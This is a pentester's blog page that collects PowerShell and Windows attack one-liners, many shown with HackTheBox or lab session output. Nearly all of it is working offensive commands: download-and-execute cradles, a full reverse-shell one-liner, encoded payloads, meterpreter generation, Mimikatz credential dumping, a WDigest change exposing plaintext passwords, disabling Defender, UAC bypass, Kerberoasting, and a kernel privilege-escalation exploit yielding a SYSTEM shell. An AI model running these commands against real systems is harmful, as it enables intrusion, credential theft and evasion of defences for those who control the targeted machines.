puckiestyle – Educating and Learning is our style

puckiestyle – Educating and Learning cyber-security

Companies we work with : of course we won’t tell 

For info or a quote, mail us at info@puckiestyle.nl or use the contact form 

whoami : Network / System Engineer MSCE 2012, OSCP 2020 , HackTheBox Omniscient ,Pentester , Security specialist , Auditor

Update April 2020
New writeups from new hackthebox machines are protected with either the Administrator password hash (if it is Windows machine) or Root password hash (if it is Linux machine)
New writeups from retired hackthebox machines are protected with root.txt
Writeups of HTB Challenges & Endgames are Private ( and not shared at all ! )
Writeups of TryHackMe Machines contains spoilers ( don’t view if ya like it to do it yourself )

powershell oneliners

PowerShell (any version):

(New-Object System.Net.WebClient).DownloadFile("http://10.10.14.19/shell-443.exe", "C:\FTP\Intranet\shell-443.exe")
PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")
C:\> PowerShell (New-Object System.Net.WebClient).DownloadFile('http://192.168.178.16:8000/launcher.bat’,’launcher.bat'); Start-Process ‘launcher.bat'
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.178.16',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
PS C:\Users\hillie> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell443.ps1')
C:\Users\hillie>cmdkey /list
Currently stored credentials:
Target: Domain:interactive=HTB\Administrator
Type: Domain Password
User: HTB\Administrator
c:\Python37>python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.98 - - [28/Feb/2019 19:38:58] "GET /puckieshell443.ps1 HTTP/1.1" 200 -
c:\Users\Public>certutil -urlcache -split -f http://10.10.14.20/puckieshell443.ps1
PS C:\pentest> certutil.exe -f -split -VerifyCTL http://192.168.178.12/msbuild_nps.xml
CertUtil: -verifyCTL command FAILED: 0x8009310b (ASN: 267 CRYPT_E_ASN1_BADTAG)
CertUtil: ASN1 bad tag value met.

PS C:\pentest> dir *.bin

Directory: C:\pentest

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         5/7/2019   4:16 PM           5462 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin

PS C:\pentest> mv 619bd719eb0f011e589ef17f4fd8693d9ba8d481.bin msbuild_nps.xml

PS C:\pentest> dir *.xml

Directory: C:\pentest

Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/7/2019 4:16 PM 5462 msbuild_nps.xml
C:\Users\Public> runas /user:HTB\administrator /savecred "powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')"
C:\Users\jacco>nc -lvp 443
listening on [any] 443 ...
10.10.10.xx: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.98] 49167: NO_DATA
Windows PowerShell running as user Administrator on HTB
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>whoami
HTB\administrator
root@kali:~/htb/access# echo -n "IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')" | iconv --to-code UTF-16LE | base64 -w 0
SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA=
c:\Users\Public> runas /user:ACCESS\administrator /savecred "powershell -EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMgAwAC8AcAB1AGMAawBpAGUAcwBoAGUAbABsADUAMwAuAHAAcwAxACcAKQA="
powershell.exe -version 2 IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.178.13/powercat.ps1');powercat -c 192.168.178.13 -p 1234 -e cmd

Full documentation here.

PowerShell 4.0 & 5.0:

PS C:\Users\hillie> Invoke-WebRequest "http://192.168.178.50/shell-443.exe" -OutFile "C:\FTP\intranet\shell-443.exe"
PS C:\Users\hillie>  
xp_cmdshell "PowerShell IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell443.ps1')
xp_cmdshell "PowerShell IEX(IWR('http://10.10.14.20/puckieshell443.ps1'))"

 

Full documentation here.

c:\inetpub\wwwroot\internal-01\log>powershell
powershell
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

Cannot load PSReadline module. Console is running without PSReadline.
PS C:\inetpub\wwwroot\internal-01\log> $username = 'BART\h.potter'
PS C:\inetpub\wwwroot\internal-01\log> $securePassword = ConvertTo-SecureString -AsPlainText -Force 'Password1'
PS C:\inetpub\wwwroot\internal-01\log> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
PS C:\inetpub\wwwroot\internal-01\log> Enter-PSSession -ComputerName localhost -Credential $credential
[localhost]: PS C:\Users\h.potter\Documents> whoami
bart\h.potter
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitOperatingSystem
True
[localhost]: PS C:\Users\h.potter\Documents> [System.Environment]::Is64BitProcess
True

PS C:\users> IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.16:8000/Sherlock.ps1')

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable
PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString(‘http://www.puckiestyle.nl/ps/powerup.ps1‘);Invoke-AllChecks"
PS C:\Users\hillie>(new-object net.webclient).downloadfile('http://10.10.14.20/powerup.ps1', 'C:\users\mssql-svc\appdata\local\temp\powerup.ps1')
PS C:\users\mssql-svc\appdata\local\temp> import-module ./powerup.ps1
   [*] Running Invoke-AllChecks

PS C:\Users\hillie> powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/invoke-mimikatz.ps1');Invoke-Mimikatz"
PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/powerview.ps1');Get-IPAddress"                    PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/windowsenum.ps1')"                                       PS C:\Users\hillie> Powershell "IEX (New-Object Net.WebClient).DownloadString('http://www.puckiestyle.nl/ps/jaws.ps1')"

Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.178.50/Invoke-Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.78.50 -Lport 4444

PS C:\users\hillie> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/MS14-058.exe", "c:\users\public\MS14-058.exe")

d:\PENTEST\impacket-examples-windows-master>psexec puckiestyle.local/administrator@192.168.178.200
PS D:\PENTEST\impacket-examples-windows-master> Connect-PSSession -ComputerName 192.168.178.200 -Credential administrator

C:\WINDOWS\system32>psexec.exe \\192.168.178.200 -u puckiestyle\puck -p p@ssw0rd cmd.exe

wmic /NODE:”DC01″ /USER:”puckiestyle\administrator” OS GET Name

wmic /node:192.168.23.214 NIC get description,macaddress

wmic /USER:”puckiestyle\puck” /PASSWORD:”p@ssw0rd” /NODE:192.168.178.200 process call create “powershell.exe -exec bypass IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.178.50/Invoke-Mimikatz.ps1’); Invoke-Mimikatz -DumpCreds | Out-File C:\\Users\\public\\a.txt”

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

rundll32.exe user32.dll,LockWorkStation

root@kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.20 LPORT=443 -f exe -o mrshell-p443.exe
root@kali# msfconsole -x "use multi/handler;set payload windows/x64/meterpreter/reverse_tcp; set lhost 10.10.14.20; set lport 443; set ExitOnSession false; exploit -j"
PS C:\WINDOWS\system32> Set-MpPreference -DisableRealtimeMonitoring $true
PS C:\WINDOWS\system32> Set-MpPreference -DisableIOAVProtection $true
change claire password to Password!
Powershell Set-ADAccountPassword -Reset -NewPassword (ConvertTo-SecureString -String 'Password1!' -AsPlainText -Force) -Identity Claire

Login as Claire and Grant Tom access to Backup_Admins
Powershell Add-ADGroupmember -Identity Backup_Admins -Members tom

Want to add a brand new executable extension (also callable from a .bat)?

C:\Users\jacco>set PATHEXT=%PATHEXT%;.puck
C:\Users\jacco>set pathext
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.puck

Want to know Applocker status from a cmd shell?

powershell -nop -c "import-module applocker; get-command *applocker*"
powershell -nop -c "import-module applocker; Get-AppLockerPolicy -Effective -Xml"

Set TrustedHosts with PowerShell (as Admin)

Set-Item -Path WSMan:\localhost\Client\TrustedHosts -Value "Computer1,Computer2"

And check (don’t need Admin for that)

Get-Item WSMan:\localhost\Client\TrustedHosts
c:\users\public\powershell IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.20/puckieshell53.ps1')
root@kali:~/htb/optimum# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.8 - - [09/Apr/2019 10:06:51] "GET /puckieshell53.ps1 HTTP/1.1" 200 -
root@kali:~/htb/optimum# nc -lvp 53
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::53
Ncat: Listening on 0.0.0.0:53
Ncat: Connection from 10.10.10.8.
Ncat: Connection from 10.10.10.8:49541.
Windows PowerShell running as user kostas on OPTIMUM
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitOperatingSystem
True
PS C:\Users\kostas\Desktop> [System.Environment]::Is64BitProcess
True
.
PS C:\users> (New-Object System.Net.WebClient).DownloadFile("http://192.168.178.16:8000/Invoke-MS16135.ps1", "c:\users\public\Invoke-MS16135.ps1")
PS C:\users\public> import-module ./Invoke-MS16135.ps1 
PS C:\users\public> Invoke-MS16135 -Command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.178.16/puckieshell53.ps1')"
_____ _____ ___ ___ ___ ___ ___ 
| | __|_ | | _|___|_ | |_ | _|
| | | |__ |_| |_| . |___|_| |_|_ |_ |
|_|_|_|_____|_____|___| |_____|___|___|

[by b33f -> @FuzzySec]


[!] Success, spawning a system shell! 

root@kali:~/htb# nc -lvp 53
listening on [any] 53 ...
192.168.178.11: inverse host lookup failed: Unknown host
connect to [192.168.178.16] from (UNKNOWN) [192.168.178.11] 49238
Windows PowerShell running as user hillie on HILLIE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\users\public>whoami
nt authority\system
PS C:\users\public>
If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

If you ever need to enable RDP (mstsc) on a Windows 10 machine, and you can’t get to the System control panel item, use Powershell to enable RDP:

Execute aboves cmdlets as Administrator in Powershell, and RDP should work.

To test the connection, open Powershell on another machine, and run:

PS C:\Users\jacco> Test-NetConnection 10.10.10.97 -CommonTCPPort rdp


ComputerName : 10.10.10.97
RemoteAddress : 10.10.10.97
RemotePort : 3389
InterfaceAlias : Ethernet 2
SourceAddress : 10.10.14.12
TcpTestSucceeded : True

PS C:\Users\jacco>
PS C:\Users\jacco> [Convert]::ToBase64String([IO.File]::ReadAllBytes( "C:\PENTEST\secret.txt"))
ZGl0IGJlc3RhbmQgaXMgZ2VoZWltDQpncm9ldGplcyBQdWNr
PS C:\Users\jacco>
PS C:\pentest> [IO.File]::WriteAllBytes( "c:\pentest\new.txt" ,[Convert]::FromBase64String( "ZGl0IGJlc3RhbmQgaXMgZ2VoZWl
tDQpncm9ldGplcyBQdWNr"))
PS C:\pentest> type new.txt
dit bestand is geheim
groetjes Puck
# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')"

# Invoke-MassMimikatz: Use to dump creds on remote host [replace $env:computername with target server name(s)]
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PewPewPew/Invoke-MassMimikatz.ps1');'$env:COMPUTERNAME'|Invoke-MassMimikatz -Verbose"

# PowerUp: Privilege escalation checks
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1’);Invoke-AllChecks”

# Invoke-Inveigh and log output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Kevin-Robertson/Inveigh/master/Scripts/Inveigh.ps1');Invoke-Inveigh -ConsoleOutput Y –NBNS Y –mDNS Y  –Proxy Y -LogOutput Y -FileOutput Y"

# Invoke-Kerberoast and provide Hashcat compatible hashes
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1');Invoke-kerberoast -OutputFormat Hashcat"

# Invoke-ShareFinder and print output to file
powershell.exe -exec Bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1');Invoke-ShareFinder -CheckShareAccess|Out-File -FilePath sharefinder.txt"

# Import PowerView Module to run further commands
powershell.exe -exec Bypass -noexit -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerView/powerview.ps1')"

# Invoke-Bloodhound
powershell.exe -exec Bypass -C "IEX(New-Object Net.Webclient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/SharpHound.ps1');Invoke-BloodHound"

# Find GPP Passwords in SYSVOL
findstr /S cpassword $env:logonserver\sysvol\*.xml
findstr /S cpassword %logonserver%\sysvol\*.xml (cmd.exe)

# Run Powershell prompt as a different user, without loading profile to the machine [replace DOMAIN and USER]
runas /user:DOMAIN\USER /noprofile powershell.exe

# Insert reg key to enable Wdigest on newer versions of Windows
reg add HKLM\SYSTEM\CurrentControlSet\Contro\SecurityProviders\Wdigest /v UseLogonCredential /t Reg_DWORD /d 1
(c)2020